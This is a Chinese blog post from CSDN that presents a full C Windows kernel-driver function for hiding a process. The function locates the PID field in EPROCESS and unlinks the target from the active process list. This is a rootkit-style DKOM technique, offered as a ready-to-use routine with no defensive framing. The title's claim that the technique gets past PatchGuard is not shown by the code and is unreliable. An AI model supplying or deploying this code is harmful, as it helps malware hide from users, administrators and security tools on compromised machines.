Windows10 Ring0下过PatchGuard隐藏进程

海鸥的诀别诗

已于 2023-03-25 11:37:59 修改

阅读量388

点赞数 1

分类专栏：底层 C\C++ 功能函数文章标签： windows visual studio 开发语言

于 2023-03-19 23:36:36 首次发布

本文链接：https://blog.csdn.net/zcy5157912/article/details/129658897

版权

C\C++ 功能函数同时被 2 个专栏收录

20 篇文章 0 订阅

订阅专栏

底层

9 篇文章 0 订阅

订阅专栏

#include<ntifs.h>
#include <ntddk.h>
#include <stdio.h>
#include <stdlib.h>
#include<windef.h>
#include <winapifamily.h> 
#include <ntimage.h>
#include<wdm.h>
NTKERNELAPI NTSTATUS PsLookupProcessByProcessId(HANDLE ProcessId, PEPROCESS *Process);
NTSTATUS HideProcess(LONG PID) {
	ULONG PID_OFFSET = 0;
	int idx = 0;
	ULONG pids[3];
	PEPROCESS eprocs[3];
	for (int i = 16; idx < 3; i += 4)
	{
		if (NT_SUCCESS(PsLookupProcessByProcessId((HANDLE)i, &eprocs[idx])))
		{
			pids[idx] = i;
			idx++;
		}
	}
	for (int i = 0x20; i < 0x300; i += 4)
	{
		if ((*(ULONG *)((UCHAR *)eprocs[0] + i) == pids[0])
			&& (*(ULONG *)((UCHAR *)eprocs[1] + i) == pids[1])
			&& (*(ULONG *)((UCHAR *)eprocs[2] + i) == pids[2]))
		{
			PID_OFFSET = i;
			break;
		}
	}

	ObDereferenceObject(eprocs[0]);
	ObDereferenceObject(eprocs[1]);
	ObDereferenceObject(eprocs[2]);
	if (PID_OFFSET == 0) {
		return STATUS_UNSUCCESSFUL;
	}
	ULONG LIST_OFFSET = PID_OFFSET;
	INT_PTR ptr;
	LIST_OFFSET += sizeof(ptr);
	PEPROCESS CurrentEPROCESS = PsGetCurrentProcess();
	PLIST_ENTRY CurrentList = (PLIST_ENTRY)((ULONG_PTR)CurrentEPROCESS + LIST_OFFSET);
	PUINT32 CurrentPID = (PUINT32)((ULONG_PTR)CurrentEPROCESS + PID_OFFSET);
	if (*(UINT32 *)CurrentPID == PID) {
		PLIST_ENTRY Previous, Next;
		Previous = (CurrentList->Blink);
		Next = (CurrentList->Flink);
		Previous->Flink = Next;
		Next->Blink = Previous;
		CurrentList->Blink = (PLIST_ENTRY)&CurrentList->Flink;
		CurrentList->Flink = (PLIST_ENTRY)&CurrentList->Flink;
		return STATUS_SUCCESS;
	}
	PEPROCESS StartProcess = CurrentEPROCESS;
	CurrentEPROCESS = (PEPROCESS)((ULONG_PTR)CurrentList->Flink - LIST_OFFSET);
	CurrentPID = (PUINT32)((ULONG_PTR)CurrentEPROCESS + PID_OFFSET);
	CurrentList = (PLIST_ENTRY)((ULONG_PTR)CurrentEPROCESS + LIST_OFFSET);
	while ((ULONG_PTR)StartProcess != (ULONG_PTR)CurrentEPROCESS) {

		if (*(UINT32 *)CurrentPID == PID) {
			PLIST_ENTRY Previous, Next;
			Previous = (CurrentList->Blink);
			Next = (CurrentList->Flink);
			Previous->Flink = Next;
			Next->Blink = Previous;
			CurrentList->Blink = (PLIST_ENTRY)&CurrentList->Flink;
			CurrentList->Flink = (PLIST_ENTRY)&CurrentList->Flink;
			return STATUS_SUCCESS;
		}
		CurrentEPROCESS = (PEPROCESS)((ULONG_PTR)CurrentList->Flink - LIST_OFFSET);
		CurrentPID = (PUINT32)((ULONG_PTR)CurrentEPROCESS + PID_OFFSET);
		CurrentList = (PLIST_ENTRY)((ULONG_PTR)CurrentEPROCESS + LIST_OFFSET);
	}
	return STATUS_SUCCESS;
}